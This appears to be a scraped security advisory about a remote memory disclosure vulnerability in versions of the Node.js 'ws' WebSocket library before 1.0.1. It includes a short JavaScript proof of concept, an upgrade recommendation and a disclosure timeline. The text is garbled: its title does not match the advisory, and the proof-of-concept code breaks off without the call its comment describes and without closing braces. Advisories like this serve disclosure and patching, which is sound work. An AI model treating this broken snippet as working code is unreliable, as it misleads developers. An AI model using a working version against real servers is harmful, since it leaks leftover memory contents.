Nondeterministic Programming Methodology
Severity: low

Remote Memory Disclosure



Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open') // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 


Update to version 1.0.1 or greater.

Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory published
    Jan 4th, 2016
  2. reported

    Initial report by Feross Aboukhadijeh / Mathias Buss
    Jan 4th, 2016